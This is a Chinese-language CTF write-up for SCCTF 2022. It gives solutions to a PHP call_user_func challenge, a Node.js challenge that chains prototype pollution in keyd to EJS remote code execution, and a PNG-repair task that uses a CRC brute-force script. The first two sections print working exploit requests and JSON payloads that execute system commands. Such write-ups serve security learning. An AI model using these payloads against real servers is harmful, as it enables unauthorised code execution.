NS - SCCTF 2022

Notes
,

省赛康康

morefile

是个Trick,代码如下 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
error_reporting(E_ALL); // 全部报告
ini_set('display_errors', 'On');
$action = $_GET['action'];
$parameters = $_GET;
var_dump($parameters);
if (isset($parameters['action'])) {
    unset($parameters['action']);
}
var_dump($parameters);
call_user_func($action, $parameters);


if(count(glob(__DIR__.'/*'))>6){
    call_user_func($action, ...$parameters);
}
show_source(__FILE__);
?>

打两次,exp如下: 

1
2
1. ?action=session_start&save_path=/var/www/
2. ?action=system&1=id

eznode

keyd < 1.4.3 原型链污染,打ejs rce
首先打这个exp,报错Error: outputFunctionName is not a valid JS identifier.

1
2
3
4
5
6
{
    "username":"admin",
    "password":"password",
    "que":"__proto__.__proto__.outputFunctionName",
    "anser":"_tmp1;global.process.mainModule.require('child_process').exec('calc');var __tmp2"
}

ok,换两步走

1
2
3
4
5
6
7
8
9
10
11
12
13
14
1. 
{
    "username":"admin",
    "password":"password",
    "que":"__proto__.__proto__.client",
    "anser":"true"
}
2. 
{
    "username":"admin",
    "password":"password",
    "que":"__proto__.__proto__.escapeFunction",
    "anser":"1; return global.process.mainModule.constructor._load('child_process').execSync('open -a /System/Applications/Calculator.app')"
}

findme

修复png,首先还原高宽

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
import zlib
import struct
import argparse
import itertools


parser = argparse.ArgumentParser()
parser.add_argument("-f", type=str, default=None, required=True,
                    help="输入同级目录下图片的名称")
args  = parser.parse_args()


bin_data = open(args.f, 'rb').read()
crc32key = zlib.crc32(bin_data[12:29]) # 计算crc
original_crc32 = int(bin_data[29:33].hex(), 16) # 原始crc


if crc32key == original_crc32: # 计算crc对比原始crc
    print('宽高没有问题!')
else:
    input_ = input("宽高被改了, 是否CRC爆破宽高? (Y/n):")
    if input_ not in ["Y", "y", ""]:
        exit()
    else: 
        for i, j in itertools.product(range(4095), range(4095)): # 理论上0x FF FF FF FF,但考虑到屏幕实际/cpu,0x 0F FF就差不多了,也就是4095宽度和高度
            data = bin_data[12:16] + struct.pack('>i', i) + struct.pack('>i', j) + bin_data[24:29]
            crc32 = zlib.crc32(data)
            if(crc32 == original_crc32): # 计算当图片大小为i:j时的CRC校验值,与图片中的CRC比较,当相同,则图片大小已经确定
                print(f"\nCRC32: {hex(original_crc32)}")
                print(f"宽度: {i}, hex: {hex(i)}")
                print(f"高度: {j}, hex: {hex(j)}")
                exit(0)


# CRC32: 0x928f61d7
# 宽度: 1217, hex: 0x4c1
# 高度: 797, hex: 0x31d

打开010editor修改,还原图片相关块的长度即可(gAMA(4),sRGB(1),pHYs(9)),链接如https://ctf-wiki.org/misc/picture/png/,可以参考的正常png如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
File: sctf.png (1421461 bytes)
  chunk IHDR at offset 0x0000c, length 13
    1000 x 562 image, 32-bit RGB+alpha, non-interlaced
  chunk sRGB at offset 0x00025, length 1
    rendering intent = perceptual
  chunk gAMA at offset 0x00032, length 4: 0.45455
  chunk pHYs at offset 0x00042, length 9: 3780x3780 pixels/meter (96 dpi)
  chunk IDAT at offset 0x00057, length 65445
    zlib: deflated, 32K window, fast compression
  chunk IDAT at offset 0x10008, length 65524
...
  chunk IDAT at offset 0x150008, length 45027
  chunk IDAT at offset 0x15aff7, length 138
  chunk IEND at offset 0x15b08d, length 0